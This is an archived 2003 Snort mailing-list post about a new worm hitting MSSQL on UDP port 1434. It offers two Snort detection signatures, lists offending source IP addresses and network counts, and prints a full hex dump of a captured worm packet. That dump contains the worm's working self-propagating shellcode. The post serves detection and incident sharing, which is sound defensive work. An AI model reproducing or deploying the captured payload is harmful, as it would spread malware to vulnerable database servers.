[Snort-sigs] Re: SQL BO attacks

Stephane Nasdrovisky stephane.nasdrovisky at ...345...
Mon Jan 27 12:38:13 EST 2003


As you guessed, it looks like a worm. Some packets comes from non routable
(10.*,...) network addresses, which, in my eye, tells me it's a worm and not an
intruder. Here is my .02 euro snort signatures for this new worm. It started on
25 Jan at 6:29:38 GMT+1.

alert udp any any -> any 1434 (msg:"mssql-030125-1"; content:"dllhel32hkern";
offset:150; depth:100)
alert udp any any -> any 1434 (msg:"mssql-030125-2"; content:"|01 01 01 01 01 01
01 01 01 01 01 01 01|"; offset:44; depth:10)

These signatures should alert on slightly diffrent eploits and eventually some
legitimate traffic.

My first offenders:
207.176.137.38
65.39.192.252
64.15.237.180
211.202.3.97
203.117.95.21
61.140.243.168
131.159.46.119
64.187.53.29
61.144.22.139
210.15.29.65

My top 11 class A networks (because my addresses are in the 11th offenders):
1408 216
1210 66
1131 212
1075 211
1053 64
1023 128
1013 207
 930 210
 913 209
 774 213
 759 195

My top 10 class C networks:
 205 207.46.200
 176 213.160.64
 136 134.79.16
 125 207.201.209
 109 216.237.145
 103 64.70.191
  94 212.141.84
  94 202.125.128
  92 207.229.137
  90 129.125.140

24590 packets reached our firewall between 6:29:38 and 10:55:35. (about 1% did
not reached the firewall, but who cares)

Here is a packet dump from which I created my snort signature:
           0: 0003 ba0b e48d 0050 7343 a257 0800 4500    .......PsC.W..E.
          16: 0194 00f2 0000 6d11 d101 da39 813a c331    ......m....9.:.1
          32: 42d1 10c8 059a 0180 aa1d 0401 0101 0101    B...............
          48: 0101 0101 0101 0101 0101 0101 0101 0101    ................
          64: 0101 0101 0101 0101 0101 0101 0101 0101    ................
          80: 0101 0101 0101 0101 0101 0101 0101 0101    ................
          96: 0101 0101 0101 0101 0101 0101 0101 0101    ................
         112: 0101 0101 0101 0101 0101 0101 0101 0101    ................
         128: 0101 0101 0101 0101 0101 01dc c9b0 42eb    ..............B.
         144: 0e01 0101 0101 0101 70ae 4201 70ae 4290    ........p.B.p.B.
         160: 9090 9090 9090 9068 dcc9 b042 b801 0101    .......h...B....
         176: 0131 c9b1 1850 e2fd 3501 0101 0550 89e5    .1...P.ý5....P..
         192: 5168 2e64 6c6c 6865 6c33 3268 6b65 726e    Qh.dllhel32hkern
         208: 5168 6f75 6e74 6869 636b 4368 4765 7454    QhounthickChGetT
         224: 66b9 6c6c 5168 3332 2e64 6877 7332 5f66    f.llQh32.dhws2_f
         240: b965 7451 6873 6f63 6b66 b974 6f51 6873    .etQhsockf.toQhs
         256: 656e 64be 1810 ae42 8d45 d450 ff16 508d    end....B.E.P..P.
         272: 45e0 508d 45f0 50ff 1650 be10 10ae 428b    E.P.E.P..P....B.
         288: 1e8b 033d 558b ec51 7405 be1c 10ae 42ff    ...=U..Qt.....B.
         304: 16ff d031 c951 5150 81f1 0301 049b 81f1    ...1.QQP........
         320: 0101 0101 518d 45cc 508b 45c0 50ff 166a    ....Q.E.P.E.P..j
         336: 116a 026a 02ff d050 8d45 c450 8b45 c050    .j.j...P.E.P.E.P
         352: ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d    ........<a...E..
         368: 0c40 8d14 88c1 e204 01c2 c1e2 0829 c28d    . at ...1226...)..
         384: 0490 01d8 8945 b46a 108d 45b0 5031 c951    .....E.j..E.P1.Q
         400: 6681 f178 0151 8d45 0350 8b45 ac50 ffd6    f..x.Q.E.P.E.P..
         416: ebca                                       ..


John Alexander wrote:

> All,
>
> I am with Fortrex Technologies and provide managed IDS.  We are seeing huge
> huge quantities of port 1434 traffic that started at 01:40 ET coming from all
> over the world and directed at all of our clients.  We are seeing the ISS
> RealSecure SQL_SSRP_BO attack in quantities like I haven't seen since Nimda
> first started up with it's thing.  Originating from random source ports and
> directed at TCP/1434.
>
> You guys seeing anything?  I'm having to use an alternate address as I can't
> get into my work account.
>
> John Alexander
> Fortrex Technologies





More information about the Snort-sigs mailing list